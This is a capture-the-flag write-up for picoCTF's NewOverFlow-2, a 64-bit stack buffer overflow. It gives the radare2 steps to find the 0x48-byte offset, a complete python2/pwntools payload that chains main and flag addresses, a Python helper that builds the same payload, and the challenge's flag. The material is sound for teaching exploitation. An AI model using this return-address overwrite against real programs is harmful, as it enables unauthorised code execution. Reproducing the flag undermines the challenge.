NewOverFlow-2
Challenge description: Okay now let's try manipulating arguments. program. You can find it in /problems/newoverflow-2_5_13f3d3dc09fc09d6d5db8adfa899a05d on the shell server. Source.
The challenge author forgot to remove the flag function, so this is solvable using the same method as
Find the offset/padding
You can use the method described in with the cyclic and cyclic_find, or you can use the following:
Open vuln in with r2 ./vuln, run aaaa, then run pdf @ sym.vuln to get var int local_40h @ rbp-0x40.
The 0x40 is the buffer location (the buffer starts 0x40 bytes below rbp), so 8 more bytes are needed to get past the "saved ebp register" (the saved rbp on 64-bit). So the offset is 0x40+8.
Run afl~flag in to get the address of flag, and afl~main to get the address of main.
We cannot offset and call the flag function directly, because that would cause a stack misalignment in 64-bit. So instead we form our payload as padding + main_address + flag_address instead of just padding + flag_address as we would in 32-bit.
We can use p64 from pwntools to convert the hex addresses to little endian.
Payload complete: python2 -c "from pwn import *; print 'A'*(0x40+8) + p64(0x004008ce) + p64(0x0040084d)" | ./vuln
picoCTF{r0p_1t_d0nT_st0p_1t_b3358018}
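As an added illustration (not part of the original writeup), the offset arithmetic and the p64 little-endian packing above written out in plain Python without pwntools: the r2 `pdf` line is parsed for the deepest rbp-relative local, 8 bytes are added for the saved rbp, and addresses are packed with struct. The r2 output lines are constructed samples in the shape the writeup shows.

```python
import re
import struct

# Constructed sample of the "var ... @ rbp-0x.." lines r2's pdf prints
# for sym.vuln; the real listing has more lines around them.
R2_PDF_LINES = """\
; var int local_40h @ rbp-0x40
; var int local_8h @ rbp-0x8
"""

# Matches both older ("var int local_40h") and newer ("var int64_t var_40h") r2 styles.
VAR_RE = re.compile(r"var\s+\S+\s+(\w+)\s+@\s+rbp-0x([0-9a-fA-F]+)")


def buffer_offset(pdf_output: str) -> int:
    """Padding needed to reach the saved return address on x86-64:
    the deepest rbp-relative local (the buffer) plus 8 bytes for the saved rbp."""
    offsets = [int(m.group(2), 16) for m in VAR_RE.finditer(pdf_output)]
    if not offsets:
        raise ValueError("no rbp-relative locals found in r2 output")
    return max(offsets) + 8


def p64(value: int) -> bytes:
    """Pack a 64-bit value little-endian, the same thing pwntools' p64 does."""
    return struct.pack("<Q", value)


def build_payload(padding: int, chain: list) -> bytes:
    """Padding followed by each return address in chain order, little-endian."""
    return b"A" * padding + b"".join(p64(addr) for addr in chain)


if __name__ == "__main__":
    off = buffer_offset(R2_PDF_LINES)          # 0x48, i.e. 0x40 + 8
    payload = build_payload(off, [0x004008CE, 0x0040084D])  # main, then flag
    print(off, payload.hex())
```

The same packing can be checked against pwntools directly: `p64(0x4008ce)` yields the bytes ce 08 40 00 00 00 00 00.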